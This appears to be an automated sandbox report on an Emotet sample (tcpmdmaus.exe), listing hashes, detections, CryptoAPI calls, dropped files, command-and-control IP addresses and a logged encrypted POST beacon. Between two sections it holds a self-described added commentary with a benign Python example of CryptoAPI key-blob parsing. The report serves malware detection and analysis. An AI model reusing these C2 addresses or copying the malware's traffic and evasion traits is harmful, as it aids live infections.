Windows Analysis Report tcpmdmaus.exe

Overview

General Information

Sample Name: tcpmdmaus.exe
Analysis ID: 497240
MD5: abe13ddc14525c4c35a85224689bfb27
SHA1: 01b8022edd4ef8e9ab20807c032b7ce2849b3df3
SHA256: 8524e558dded9665e69541b332d556e43c007d0d4001fe5355ac4816c22e7a21

Detection

Emotet
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
Machine Learning detection for sample
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to launch a process as a different user
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to delete services

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: tcpmdmaus.exe Virustotal: Detection: 85%
Source: tcpmdmaus.exe Metadefender: Detection: 16%
Source: tcpmdmaus.exe ReversingLabs: Detection: 96%
Antivirus / Scanner detection for submitted sample
Source: tcpmdmaus.exe Avira: detected
Machine Learning detection for sample
Source: tcpmdmaus.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 0_2_003B14C9 wsprintfA,GetBinaryTypeA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree, 0_2_003B14C9
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_003B14C9 wsprintfA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree, 5_2_003B14C9
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD20D9 CryptExportKey, 5_2_00CD20D9
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2435 CryptVerifySignatureW,CryptDestroyHash, 5_2_00CD2435
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD21F9 CryptGenKey,CryptDestroyKey,CryptReleaseContext, 5_2_00CD21F9
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2195 CryptImportKey,LocalFree,CryptReleaseContext, 5_2_00CD2195
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2174 CryptDecodeObjectEx,CryptReleaseContext, 5_2_00CD2174
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2129 CryptGetHashParam, 5_2_00CD2129
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD22A6 CryptDuplicateHash, 5_2_00CD22A6
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2261 CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 5_2_00CD2261
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2217 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 5_2_00CD2217
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2396 CryptDuplicateHash,CryptDecrypt,CryptDestroyHash, 5_2_00CD2396
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2307 CryptEncrypt,CryptDestroyHash, 5_2_00CD2307
Source: C:\Users\user\Desktop\tcpmdmaus.exe Code function: 5_2_00CD2336 CryptDestroyHash, 5_2_00CD2336
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 6_2_003B14C9 wsprintfA,GetBinaryTypeA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree, 6_2_003B14C9
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_003B14C9 wsprintfA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree, 7_2_003B14C9
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_01482195 CryptImportKey,LocalFree,CryptReleaseContext, 7_2_01482195
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_01482336 CryptDestroyHash, 7_2_01482336
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_01482129 CryptGetHashParam, 7_2_01482129
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_01482435 CryptVerifySignatureW,CryptDestroyHash, 7_2_01482435
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_01482261 CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 7_2_01482261
Source: C:\Windows\SysWOW64\sharedconnect.exe Code function: 7_2_014822A6 CryptDuplicateHash, 7_2_014822A6
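The call lists above name the CryptoAPI routines but not the structures they exchange. Two things are worth reading out of them before the example: the function at 0x3B14C9, listed first under this heading for both the submitted file and the dropped C:\Windows\SysWOW64\sharedconnect.exe, calls no CryptoAPI routine at all, so the CryptoAPI usage is the 5_2_00CD2xxx group; and the 7_2_01482xxx functions in sharedconnect.exe share the low 16 bits of their addresses with that group (0x2195, 0x2129, 0x2435, 0x2261, 0x22A6, 0x2336), i.e. the dropped copy runs the same routines at a different load base. The following is an added example, not code from the report or from the sample: it builds and parses the two CryptoAPI blob formats that sit behind CryptDecodeObjectEx/CryptImportKey (a DER RSA public key converted into a PUBLICKEYBLOB and imported) and CryptGenKey/CryptExportKey (a session key exported as a SIMPLEBLOB, wrapped under that public key), using only the Python standard library. Everything in it is constructed: the RSA key is a toy made from two Mersenne primes so the block runs without a crypto library, the 16-byte session key and the padding bytes are fixed values, and the ordering of the calls is an inference from the list above, not something the report states.

```python
# Added example, not code from the report or the sample: the CryptoAPI key-blob
# layouts behind CryptDecodeObjectEx -> CryptImportKey (RSA public key in) and
# CryptGenKey -> CryptExportKey(SIMPLEBLOB) (session key out). Stdlib only.
import struct

# wincrypt.h constants
PUBLICKEYBLOB, SIMPLEBLOB, CUR_BLOB_VERSION = 0x06, 0x01, 0x02
CALG_RSA_KEYX, CALG_RSA_SIGN, CALG_AES_128 = 0x0000A400, 0x00002400, 0x0000660E
RSA1_MAGIC = 0x31415352  # b"RSA1" read as a little-endian DWORD

def _tlv(buf, pos):
    """One DER tag/length/value; returns (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long-form length
        nbytes = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    return tag, buf[pos:pos + length], pos + length

def der_decode_rsa_public_key(der):
    """PKCS#1 RSAPublicKey ::= SEQUENCE { n INTEGER, e INTEGER } -> (n, e): the form
    CryptDecodeObjectEx(RSA_CSP_PUBLICKEYBLOB) converts into a PUBLICKEYBLOB."""
    tag, seq, end = _tlv(der, 0)
    tag_n, n_bytes, pos = _tlv(seq, 0)
    tag_e, e_bytes, pos = _tlv(seq, pos)
    if tag != 0x30 or end != len(der) or (tag_n, tag_e) != (2, 2) or pos != len(seq):
        raise ValueError("expected one SEQUENCE of two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")

def der_encode_rsa_public_key(n, e):
    """Inverse of the above; used only to build the sample input."""
    def length(size):
        lb = size.to_bytes((size.bit_length() + 7) // 8, "big")
        return bytes([size]) if size < 0x80 else bytes([0x80 | len(lb)]) + lb
    def integer(v):
        body = v.to_bytes(v.bit_length() // 8 + 1, "big")  # keeps the sign bit clear
        return b"\x02" + length(len(body)) + body
    body = integer(n) + integer(e)
    return b"\x30" + length(len(body)) + body

def rsa_publickeyblob(n, e):
    """BLOBHEADER + RSAPUBKEY + modulus, as CryptImportKey consumes it.
    The modulus is little-endian, unlike every other RSA key encoding."""
    if e >= 1 << 32:
        raise ValueError("RSAPUBKEY.pubexp is a DWORD")
    nbytes = (n.bit_length() + 7) // 8
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    return header + struct.pack("<III", RSA1_MAGIC, nbytes * 8, e) + n.to_bytes(nbytes, "little")

def parse_publickeyblob(blob):
    """(n, e) from a PUBLICKEYBLOB, e.g. one carved from process memory; accepts
    key-exchange (CALG_RSA_KEYX) and signature (CALG_RSA_SIGN) keys."""
    btype, _ver, _res, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<III", blob, 8)
    if btype != PUBLICKEYBLOB or magic != RSA1_MAGIC or alg not in (CALG_RSA_KEYX, CALG_RSA_SIGN):
        raise ValueError("not an RSA1 PUBLICKEYBLOB")
    if len(blob) != 20 + bitlen // 8:
        raise ValueError("blob length does not match bitlen")
    return int.from_bytes(blob[20:], "little"), pubexp

def simpleblob_export(session_key, n, e, pad):
    """CryptExportKey(hSession, hPub, SIMPLEBLOB): session key in a PKCS#1 v1.5
    type-2 block, RSA-encrypted to the peer's public key, ciphertext little-endian.
    `pad` supplies the non-zero padding bytes (random in CryptoAPI, fixed here)."""
    k = (n.bit_length() + 7) // 8
    ps_len = k - 3 - len(session_key)
    if ps_len < 8 or b"\x00" in pad[:ps_len]:
        raise ValueError("need at least 8 non-zero padding bytes")
    block = b"\x00\x02" + pad[:ps_len] + b"\x00" + session_key
    ct = pow(int.from_bytes(block, "big"), e, n)
    header = struct.pack("<BBHI", SIMPLEBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128)
    return header + struct.pack("<I", CALG_RSA_KEYX) + ct.to_bytes(k, "little")

def simpleblob_unwrap(blob, n, d):
    """The private-key holder recovers the session key from a SIMPLEBLOB."""
    btype, _ver, _res, _key_alg = struct.unpack_from("<BBHI", blob, 0)
    (wrap_alg,) = struct.unpack_from("<I", blob, 8)
    if btype != SIMPLEBLOB or wrap_alg != CALG_RSA_KEYX:
        raise ValueError("not an RSA-wrapped SIMPLEBLOB")
    k = (n.bit_length() + 7) // 8
    block = pow(int.from_bytes(blob[12:12 + k], "little"), d, n).to_bytes(k, "big")
    if block[:2] != b"\x00\x02" or b"\x00" not in block[2:]:
        raise ValueError("bad PKCS#1 v1.5 block")
    return block[block.index(b"\x00", 2) + 1:]

def demo():
    # Toy RSA key from two Mersenne primes so this runs without a crypto library;
    # it is trivially factorable and exists only to exercise the formats.
    p, q, e = (1 << 521) - 1, (1 << 607) - 1, 65537
    n, d = p * q, pow(e, -1, (p - 1) * (q - 1))
    blob = rsa_publickeyblob(*der_decode_rsa_public_key(der_encode_rsa_public_key(n, e)))
    n2, e2 = parse_publickeyblob(blob)                     # what CryptImportKey sees
    session_key = bytes(range(0x10, 0x20))                 # constructed; stands in for CryptGenKey
    pad = bytes(0x41 + i % 26 for i in range(256))         # constructed non-zero padding
    wrapped = simpleblob_export(session_key, n2, e2, pad)  # CryptExportKey(SIMPLEBLOB)
    return {"blob_len": len(blob), "wrapped_len": len(wrapped),
            "pubkey_roundtrip": (n2, e2) == (n, e),
            "session_key_roundtrip": simpleblob_unwrap(wrapped, n, d) == session_key}
```

The practical use of the two parsers is memory carving: a PUBLICKEYBLOB starts with the bytes 06 02 00 00 00 A4 00 00 52 53 41 31 (or 00 24 00 00 for a signature key), so a search for that prefix in a process dump followed by parse_publickeyblob() yields the modulus; a SIMPLEBLOB on the wire starts 01 02 00 00 followed by the session-key ALG_ID, and without the matching private key simpleblob_unwrap() cannot recover it, which is the point of wrapping it that way.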

Compliance:

Uses 32bit PE files
Source: tcpmdmaus.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: tcpmdmaus.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ewjrRWJW##@HRh.pdb source: tcpmdmaus.exe

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 24.217.117.217
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 77.157.40.119:443
Content-Length: 388
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2e f5 8d 30 20 97 63 af c8 5c 78 1d 1b 05 84 50 56 8e 19 5b d4 5e 84 69 7f 59 6c 87 46 e0 d0 59 8a f6 f3 38 80 a7 31 36 2a 41 93 7c 48 14 e8 94 4c f9 4b a4 47 e8 3f dd ae dc 2e 2b a6 0b 4e 9c 34 a8 33 bf b2 99 f0 55 30 50 57 c9 c7 08 84 57 c2 87 fe ef f4 fc 77 58 f0 6b 96 ac 8a dc 86 e9 20 3d c9 74 db ea 0a ab 88 74 c8 a2 da fc ca 06 27 02 7e a7 63 dd 3c 82 37 62 c3 a8 6a 68 12 a6 6c 70 b1 91 2e 31 24 27 9d ec 9e b1 3c 60 67 ed 52 57 23 21 97 d1 43 4b 2b f3 c0 e1 d7 82 bd 52 05 c3 43 20 17 61 0a dc ab cd c6 64 a6 a4 fe c2 c1 49 a3 e5 b5 c1 14 51 03 79 f0 cd 9d 37 2c 80 ec 86 6d 01 ab 1d 6e 2b af 18 4a 34 7e 89 f2 2d df ca f3 76 fb 2a 58 a0 da 6e 5b b3 e4 35 ff 79 1c 08 46 4f f8 f4 d1 97 26 3f 57 f1 fe 15 cb 39 c2 3f 9a 59 61 23 4a 83 97 0b 58 bb b3 e5 2d a3 fb 9e bd 22 dc 9e 9e e9 b1 bf 77 80 43 48 4f 42 61 24 17 ab 8b 56 2a d4 4c c4 56 1c 00 70 44 c3 81 65 e6 f8 8f 76 25 88 52 c6 8c 6e 33 f3 e4 0e 60 c1 63 0e 7a 7b 6f 50 ab 44 30 93 04 9f e4 a9 3a 73 17 af 84 fb 97 c1 dd 90 81 87 1b d4 f8 ce e1 a3 09 5c f0 44 44 8f 9c 35 7c bc 2a c5 93 40 4e 97 a2 d9 5b ed bd de 1b 90 8c 2a 61 27 49 13 6f 1a d4 55 91 07 0b ff b1 62 6e ec f2 b1 b2 df 1a d2 2d c8
Data Ascii: .0 c\xPV[^iYlFY816*A|HLKG?.+N43U0PWWwXk =tt'~c<7bjhlp.1$'<`gRW#!CK+RC adIQy7,mn+J4~-v*Xn[5yFO&?W9?Ya#JX-"wCHOBa$V*LVpDev%Rn3`cz{oPD0:s\DD5|*@N[*a'IoUbn-
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49840 -> 66.220.110.56:50000
Source: global traffic TCP traffic: 192.168.2.6:49848 -> 197.82.220.82:8080
Source: global traffic TCP traffic: 192.168.2.6:49851 -> 212.83.128.139:8080
Source: global traffic TCP traffic: 192.168.2.6:49852 -> 139.162.216.32:8080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.216.32
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.216.32
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.216.32
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: svchost.exe, 0000000E.00000002.477891576.0000012F64B00000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.743701723.000001FADEA8A000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000E.00000002.477596789.0000012F642E7000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.743601011.000001FADEA18000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.microsoft.co
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/r
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/e5f6356f-80b5-47df-960c-a214cf301822/55652
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000000E.00000003.459588748.0000012F65002000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 77.157.40.119:443Content-Length: 388Connection: Keep-AliveCache-Control: no-cacheData Raw: 2e f5 8d 30 20 97 63 af c8 5c 78 1d 1b 05 84 50 56 8e 19 5b d4 5e 84 69 7f 59 6c 87 46 e0 d0 59 8a f6 f3 38 80 a7 31 36 2a 41 93 7c 48 14 e8 94 4c f9 4b a4 47 e8 3f dd ae dc 2e 2b a6 0b 4e 9c 34 a8 33 bf b2 99 f0 55 30 50 57 c9 c7 08 84 57 c2 87 fe ef f4 fc 77 58 f0 6b 96 ac 8a dc 86 e9 20 3d c9 74 db ea 0a ab 88 74 c8 a2 da fc ca 06 27 02 7e a7 63 dd 3c 82 37 62 c3 a8 6a 68 12 a6 6c 70 b1 91 2e 31 24 27 9d ec 9e b1 3c 60 67 ed 52 57 23 21 97 d1 43 4b 2b f3 c0 e1 d7 82 bd 52 05 c3 43 20 17 61 0a dc ab cd c6 64 a6 a4 fe c2 c1 49 a3 e5 b5 c1 14 51 03 79 f0 cd 9d 37 2c 80 ec 86 6d 01 ab 1d 6e 2b af 18 4a 34 7e 89 f2 2d df ca f3 76 fb 2a 58 a0 da 6e 5b b3 e4 35 ff 79 1c 08 46 4f f8 f4 d1 97 26 3f 57 f1 fe 15 cb 39 c2 3f 9a 59 61 23 4a 83 97 0b 58 bb b3 e5 2d a3 fb 9e bd 22 dc 9e 9e e9 b1 bf 77 80 43 48 4f 42 61 24 17 ab 8b 56 2a d4 4c c4 56 1c 00 70 44 c3 81 65 e6 f8 8f 76 25 88 52 c6 